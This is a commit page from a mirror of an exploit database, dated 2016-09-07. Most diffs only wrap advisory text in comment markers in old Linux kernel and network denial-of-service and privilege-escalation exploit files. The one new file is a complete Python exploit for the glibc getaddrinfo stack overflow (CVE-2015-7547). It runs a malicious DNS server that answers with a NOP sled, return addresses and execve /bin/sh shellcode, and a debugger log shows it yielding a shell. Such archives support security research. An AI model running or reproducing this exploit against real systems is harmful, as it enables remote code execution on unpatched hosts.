bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-07

Browse source 
3 new exploits

Too many to list!
This commit is contained in:
Offensive Security 2016-09-07 05:09:19 +00:00
parent 479ae86249
commit d36011b4f9
70 changed files with 5730 additions and 5054 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10077
files.csv
View file

File diff suppressed because it is too large Load diff

2
platforms/atheos/local/21282.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/4051/info
AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project.
It is possible to escape change rooted directories on AtheOS. Due to insufficient handling of relative pathes, a process in the change rooted directory may change directory using the dot-dot-slash (../) specifier. This would allow access to the system with the privileges of the change rooted process.
*/
#include <stdio.h>
#include <unistd.h>

2
platforms/bsd/dos/21077.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/3220/info
It has been reported that there is a locally exploitable vulnerability in BSDI.
@ -5,6 +6,7 @@ It has been reported that there is a locally exploitable vulnerability in BSDI.
It is allegedly possible for a userland process to cause the kernel to halt.
This may be due to a bad system call.
*/
/* (BSDi)*[v3.0/3.1] system failure, by
v9[v9@realhalo.org]. this will result

2
platforms/hardware/webapps/40332.py
View file

@ -66,7 +66,7 @@ def usage():
print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
print "By: Elvis Collado [b1ack0wl]"
print ""
print "Usage: %s -s source.ip -d dst.ip % sys.argv[0]
print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]
print ""
print "\t-s Connect back IP [LHOST]"
print "\t-d Destination IP of Socket Listener [RHOST]"

3
platforms/linux/dos/19117.c
View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/147/info
The "Smurf" denial of service exploits the existance, and forwarding of, packets sent to IP broadcast addreses. By creating an ICMP echo request packet, with the source address set to an IP within the network to be attacked, and the destination address the IP broadcast address of a network which will forward and respond to ICMP echo packets sent to broadcast. Each packet sent in to the network being used to conduct the attack will be responded to by any machine which will respond to ICMP on the broadcast address. Therefore, a single packet can result in an overwhelming response count, all of which are directed to the network the attacker has forged as the source. This can result in significant bandwidth loss.
*/
/*
*

3
platforms/linux/dos/19271.c
View file

@ -1,9 +1,12 @@
/*
source: http://www.securityfocus.com/bid/343/info
It is possible to leak kernel memory and render TCP ports above 1024 unusable, locked forever in the CLOSE_WAIT state in linux kernels prior to the late 2.1.x and 2.2.0pre releases. In addition to being intentionally exploited, unix applications compiled on linux that are multithreaded may also cause these problems.
Below is a harmless example of the exploit:
*/
// This program will kill a random port on a linux machine. The kernel will

3
platforms/linux/dos/19282.c
View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/363/info
The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code <src/daemon.c>:
*/
t = accept(DaemonSocket,

3
platforms/linux/dos/19818.c
View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/1072/info
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
*/
#include <sys/types.h>
#include <sys/socket.h>

3
platforms/linux/dos/22105.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/6420/info
A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap().
It should be noted that this issue does not affect the 2.4 kernel tree. This is because support for mmap() in the /proc/pid/mem implementation has been dropped.
*/
#define PAGES 10

3
platforms/linux/dos/23946.c
View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/10096/info
A vulnerability has been reported in the Linux Kernel that may permit a malicious local user to affect a system-wide denial of service condition. This issue may be triggered via the Kernel signal queue (struct sigqueue) and may be exploited to exhaust the system process table by causing an excessive number of threads to be left in a zombie state.
*/
#include <signal.h>
#include <unistd.h>

2
platforms/linux/dos/24078.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/10264/info
PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled.
The vulnerability may be exploited by a local attacker to influence the kernel into an infinite loop.
*/
/*
PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept

3
platforms/linux/dos/24804.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/11842/info
The Linux Kernel is reported prone to a local denial of service vulnerability. It is reported that the vulnerability exists due to a failure by 'aio_free_ring' to handle exceptional conditions.
@ -7,6 +8,8 @@ This vulnerability requires that mmap() is employed to map the maximum amount of
It is reported that when handing 'io_setup' syscalls that are passed large values, the Linux kernel 'aio_setup_ring' will attempt to allocate a structure of page pointers.
When a subsequent 'aio_setup_ring' mmap() call fails, 'aio_free_ring' attempts to clean up the page pointers, it will crash during this procedure triggering a kernel panic.
*/
#include <signal.h>
#include <sys/mman.h>

3
platforms/linux/dos/25322.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/12949/info
A local denial of service vulnerability reportedly affects the Linux kernel. This issue arises due to a failure of the kernel to properly handle malicious, excessive file locks.
@ -5,6 +6,8 @@ A local denial of service vulnerability reportedly affects the Linux kernel. Thi
An attacker may leverage this issue to crash or hang the affected kernel and deny service to legitimate users.
It should be noted that Symantec has been unable to reproduce this issue after testing. It is possible that this vulnerability is linked to the reporter's specific configuration. More information will be added as it becomes available.
*/
#include <stdio.h>
#include <stdlib.h>

3
platforms/linux/dos/26382.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/15156/info
Linux Kernel is reported prone to a local denial-of-service vulnerability.
This issue arises from an infinite loop when binding IPv6 UDP ports.
*/
/*
* Linux kernel

3
platforms/linux/dos/26489.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/15365/info
Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed.
This issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed.
*/
/*
* Linux kernel

2
platforms/linux/dos/26648.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/15627/info
Linux kernel is susceptible to a local denial-of-service vulnerability.
@ -7,6 +8,7 @@ Local attackers may trigger this issue by obtaining numerous file-lock leases, w
This issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and a denial of service for legitimate users.
Kernel versions prior to 2.6.15-rc3 are vulnerable to this issue.
*/
#include <unistd.h>

3
platforms/linux/dos/26749.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/15745/info
Linux kernel is susceptible to a local denial-of-service vulnerability.
@ -7,6 +8,8 @@ This issue is triggered when excessive kernel memory is consumed by numerous fil
This issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and ultimately to a denial of service for legitimate users.
Kernel versions from 2.6.10 through to 2.6.14.2 are vulnerable to this issue.
*/
#include <unistd.h>

3
platforms/linux/dos/26811.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/15846/info
Linux kernel is prone to a local integer-overflow vulnerability.
@ -5,6 +6,8 @@ Linux kernel is prone to a local integer-overflow vulnerability.
A successful attack can result in a kernel crash. Arbitrary code execution may be possible as well, but this has not been confirmed.
All 2.6.x versions of the Linux kernel are considered vulnerable at the moment.
*/
#define _GNU_SOURCE
#define __USE_FILE_OFFSET64

3
platforms/linux/dos/27031.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/16135/info
Linux kernel is prone to a local denial-of-service vulnerability.
@ -5,6 +6,8 @@ Linux kernel is prone to a local denial-of-service vulnerability.
This issue affects the 'set_mempolicy()' function of the 'mm/mempolicy.c' file.
Successful exploitation causes the kernel to crash, leading to a denial-of-service condition.
*/
#include <asm/unistd.h>

3
platforms/linux/dos/29781.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/23142/info
The Linux kernel is prone to a NULL-pointer dereference vulnerability.
A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute arbitrary code with elevated privileges, but this has not been confirmed.
*/
__ ip2.c __
// advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker

2
platforms/linux/dos/29916.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/23677/info
The Linux kernel is prone to a denial-of-service vulnerability. This issue presents itself when a NETLINK message is misrouted.
@ -5,6 +6,7 @@ The Linux kernel is prone to a denial-of-service vulnerability. This issue prese
A local attacker may exploit this issue to trigger an infinite-recursion stack-based overflow in the kernel. This results in a denial of service to legitimate users.
Versions prior to 2.6.20.8 are vulnerable.
*/
#include <assert.h>
#include <stdio.h>

3
platforms/linux/dos/30080.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/24134/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users.
*/
#include <sys/types.h>
#include <sys/ioctl.h>

3
platforms/linux/dos/30902.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/26943/info
The Linux kernel is prone to a remote denial-of-service vulnerability because it fails to adequately validate specially crafted IPv6 'Hop-By-Hop' headers.
Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users.
*/
/*
* Clemens Kurtenbach <ckurtenbach at s21sec . com>

3
platforms/linux/dos/31965.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/29945/info
The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.
Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users.
*/
#include <stdlib.h>
#include <sys/ptrace.h>

2
platforms/linux/dos/31966.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/29945/info
The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.
Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users.
*/
/* This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any

3
platforms/linux/dos/32682.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/32985/info
The Linux kernel is prone to a local denial-of-service vulnerability.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users.
Versions prior to Linux kernel 2.6.25 are vulnerable.
*/
#include <stdio.h>
#include <unistd.h>

3
platforms/linux/dos/33015.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/35143/info
The Linux kernel is prone to a local denial-of-service vulnerability.
@ -9,6 +10,8 @@ This issue was introduced in Linux Kernel 2.6.19. The following versions have be
Linux Kernel 2.6.30-rc3
Linux Kernel 2.6.27.24
Linux Kernel 2.6.29.4
*/
pipe(pfds);
snprintf(buf, sizeof(buf), "/tmp/%d", getpid());

3
platforms/linux/dos/33148.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/35976/info
The Linux kernel is prone to a local denial-of-service vulnerability.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
This issue was introduced in Linux kernel 2.6.28-rc1 and fixed in 2.6.31-rc5-git3.
*/
#include <time.h>

3
platforms/linux/dos/33193.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/36191/info
The Linux kernel is prone to a local denial-of-service vulnerability.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
This issue was introduced in Linux kernel 2.6.26 and fixed in 2.6.31-rc8.
*/
/* gcc -o KernelTtyTest KernelTtyTest.c -Wall -O2 -lutil */
#define _GNU_SOURCE 1

3
platforms/linux/dos/33635.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/38185/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
*/
/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */

3
platforms/linux/dos/35013.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/45036/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
*/
#include <sys/inotify.h>
#include <unistd.h>

3
platforms/linux/dos/35403.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/46630/info
The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users.
*/
#include <unistd.h>
#include <sys/epoll.h>

2
platforms/linux/dos/35404.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/46630/info
The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users.
*/
#include <unistd.h>
#include <sys/epoll.h>

2
platforms/linux/dos/35600.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/47296/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
*/
#include <sys/inotify.h>
#include <unistd.h>

2
platforms/linux/dos/35820.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/48101/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition.
*/
#include <stdio.h>
#include <stdlib.h>

2
platforms/linux/dos/38589.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/60586/info
The Linux Kernel is prone to a local denial-of-service vulnerability.
Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions.
*/
/*
** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)

3
platforms/linux/local/20000.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/1322/info
POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner.
@ -20,6 +21,8 @@ set
a simple su - yomama should give you root.
This exploit was written by me in a hurry, I hope there are no mistakes
*/
-- snip -- ex.c --

4
platforms/linux/local/23634.c
View file

@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/9550/info
// source: http://www.securityfocus.com/bid/9550/info
The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client.
// The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client.
/*
* Simple local exploit for 0verkill by pi3 (pi3ki31ny)

2
platforms/linux/local/23658.c
View file

@ -1,6 +1,8 @@
/*
source: http://www.securityfocus.com/bid/9596/info
VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory.
*/
/* vserver@deadbeef.de modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

2
platforms/linux/local/29446.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/22014/info
Grsecurity Kernel PaX is prone to a local privilege-escalation vulnerability.
@ -7,6 +8,7 @@ An attacker can exploit this issue to obtain superuser privileges. A successful
NOTE: The vendor disputes the issue, stating that the application is not vulnerable.
Digital Armaments has provided an exploit and updated advisory outlining specific details of this vulnerability. Please see the reference section for further information.
*/
/*
** expand_stack() PaX local root vulnerability

3
platforms/linux/local/30604.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/25774/info
The Linux kernel is prone to a local privilege-escalation vulnerability.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
*/
/*
* exploit for x86_64 linux kernel ia32syscall emulation

4
platforms/linux/local/30605.c
View file

@ -1,10 +1,14 @@
/*
source: http://www.securityfocus.com/bid/25774/info
/*
The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
*/
/*
*****************************************************************************************

3
platforms/linux/local/32805.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/33846/info
The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible operation.
@ -5,6 +6,8 @@ The Linux Kernel is prone to an information-disclosure vulnerability because it
Successful exploits will allow attackers to view portions of kernel memory. Information harvested may be used in further attacks.
Versions prior to Linux Kernel 2.6.28.8 are vulnerable.
*/
int main(void)
{

2
platforms/linux/local/34987.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/44758/info
The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
*/
/*
* You've done it. After hours of gdb and caffeine, you've finally got a shell

3
platforms/linux/local/36294.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/50573/info
The Linux kernel is prone to a local information-disclosure weakness.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local information-disclosure weakness.
Successful exploits allow local attackers to obtain the password length of a victim's account; information harvested may aid in further attacks.
Linux kernel 3.1 and prior are vulnerable.
*/
/*
* A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1.

3
platforms/linux/local/37543.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/54702/info
The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
*/
/***************** rds_client.c ********************/

2
platforms/linux/local/39214.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/68048/info
The Linux kernel is prone to a local information-disclosure vulnerability.
@ -5,6 +6,7 @@ The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks.
Linux kernel 2.6.38 through 3.15-rc2 are vulnerable.
*/
/*
* $File: media-enum-poc.c

2
platforms/linux/remote/21725.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/5503/info
MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows.
@ -5,6 +6,7 @@ MySQL is is an open source relational database project, and is available for a n
A weak default configuration problem has been reported in the Windows binary release of MySQL. Reportedly, the root user of the database is defined with no password, and granted login privileges from any host.
This issue has been reported in the Windows binary release of MySQL. Other versions may share this default configuration, this has not however been confirmed.
*/
//mysqlfuck.c
/*--||MySQLfuck||--*/

2
platforms/linux/remote/21726.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/5503/info
MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows.
@ -5,6 +6,7 @@ MySQL is is an open source relational database project, and is available for a n
A weak default configuration problem has been reported in the Windows binary release of MySQL. Reportedly, the root user of the database is defined with no password, and granted login privileges from any host.
This issue has been reported in the Windows binary release of MySQL. Other versions may share this default configuration, this has not however been confirmed.
*/
/*
Program: finger_mysql.c

2
platforms/linux/remote/22129.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/6527/info
A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun.
@ -5,6 +6,7 @@ A vulnerability has been discovered in H-Sphere Webshell. During the pre-authent
Successful exploitation of this issue would allow an attacker to overwrite the vulnerable function's instruction pointer. By causing the program to return to attacker-supplied instructions, it may be possible to execute arbitrary code with the privileges of the target process.
It should be noted that this issue was discovered in H-Sphere 2.3 RC3. It is not yet known whether earlier versions are also vulnerable.
*/
/*
* Remote r00t exploit for Webshell 2.4 (possibly other versions).

238
platforms/linux/remote/40339.py Executable file
View file

@ -0,0 +1,238 @@
'''
add by SpeeDr00t@Blackfalcon (jang kyoung chip)
This is a published vulnerability by google in the past.
Please refer to the link below.
Reference:
- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
- https://github.com/fjserna/CVE-2015-7547
- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow
When Google announced about this code(vulnerability),
it was missing information on shellcode.
So, I tried to completed the shellcode.
In the future, I hope to help your study.
(gdb) gdb -q client1
Undefined command: "gdb". Try "help".
(gdb) r
Starting program: /home/haker/client1
Got object file from memory but can't read symbols: File truncated.
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send
sendto 1
TCP Connected with 127.0.0.1:60259
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = <EFBFBD><EFBFBD>foobargooglecom
query = foobargooglecom$(<EFBFBD>foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send
sendto 1
TCP Connected with 127.0.0.1:60260
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = <EFBFBD><EFBFBD>foobargooglecom
query = foobargooglecom$<EFBFBD>7foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
process 6415 is executing new program: /bin/dash
$ id
uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
$
'''
import socket
import time
import struct
import threading
IP = '192.168.111.5' # Insert your ip for bind() here...
ANSWERS1 = 184
terminate = False
last_reply = None
reply_now = threading.Event()
def dw(x):
return struct.pack('>H', x)
def dd(x):
return struct.pack('>I', x)
def dl(x):
return struct.pack('<Q', x)
def db(x):
return chr(x)
def udp_thread():
global terminate
# Handle UDP requests
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((IP, 53))
reply_counter = 0
counter = -1
answers = []
while not terminate:
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id_udp = struct.unpack('>H', data[0:2])[0]
query_udp = data[12:]
# Send truncated flag... so it retries over TCP
data = dw(id_udp) # id
data += dw(0x8380) # flags with truncated set
data += dw(1) # questions
data += dw(0) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query_udp # question
data += '\x00' * 2500 # Need a long DNS response to force malloc
answers.append((data, addr))
if len(answers) != 2:
continue
counter += 1
if counter % 4 == 2:
answers = answers[::-1]
print 'udp send '
time.sleep(0.01)
sock_udp.sendto(*answers.pop(0))
print 'sendto 1 '
reply_now.wait()
sock_udp.sendto(*answers.pop(0))
print 'sendto 2 '
sock_udp.close()
def tcp_thread():
global terminate
counter = -1
#Open TCP socket
sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_tcp.bind((IP, 53))
sock_tcp.listen(10)
print 'a'
while not terminate:
conn, addr = sock_tcp.accept()
counter += 1
print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])
# Read entire packet
data = conn.recv(1024)
print '[TCP] Total Data len recv ' + str(len(data))
reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])
print '[TCP] Request1 len recv ' + str(reqlen1)
data1 = data[2:2+reqlen1]
print 'data1 = ' +data1
id1 = struct.unpack('>H', data1[0:2])[0]
query1 = data[12:]
print 'query = ' + query1
# Do we have an extra request?
data2 = None
if len(data) > 2+reqlen1:
reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])
print '[TCP] Request2 len recv ' + str(reqlen2)
data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]
id2 = struct.unpack('>H', data2[0:2])[0]
query2 = data2[12:]
# Reply them on different packets
data = ''
data += dw(id1) # id
data += dw(0x8180) # flags
data += dw(1) # questions
data += dw(ANSWERS1) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query1 # question
for i in range(ANSWERS1):
answer = dw(0xc00c) # name compressed
answer += dw(1) # type A
answer += dw(1) # class
answer += dd(13) # ttl
answer += dw(4) # data length
answer += 'D' * 4 # data
data += answer
data1_reply = dw(len(data)) + data
if data2:
data = ''
data += dw(id2)
data += 'A' * (6)
data += '\x08\xc5\xff\xff\xff\x7f\x00\x00'
data += '\x90' * (44)
data += '\x90' * (1955)
data += '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
data += '\x90' * (100)
data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
data += 'F' * (8)
data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
data += 'G' * (134)
data2_reply = dw(len(data)) + data
else:
data2_reply = None
reply_now.set()
time.sleep(0.01)
conn.sendall(data1_reply)
print 'data1_reply'
time.sleep(0.01)
if data2:
conn.sendall(data2_reply)
print 'data2_reply'
reply_now.clear()
sock_tcp.shutdown(socket.SHUT_RDWR)
sock_tcp.close()
if __name__ == "__main__":
t = threading.Thread(target=udp_thread)
t.daemon = True
t.start()
tcp_thread()
terminate = True

3
platforms/multiple/dos/19423.c
View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/526/info
Operating systems with a shared memory implementation based on or influenced by the 4.4BSD code may be vulnerable to a denial of service attack The problem exists because you can mmap() or shmget() as much memory as you'd like bypassing rlimits. When you trigger pagefaults, the system will begin allocating the memory (it's not actually allocated at first) and run out. With System V IPC the memory remains allocated even after the process has stopped running.
*/
/*
* This program can be used to exploit DoS bugs in the VM systems or utility

2
platforms/multiple/dos/20810.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
@ -5,6 +6,7 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
/*
* imland - improved multiple land

3
platforms/multiple/dos/20813.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
@ -5,6 +6,8 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
/**************************************************************/
/* */

3
platforms/multiple/dos/20997.c
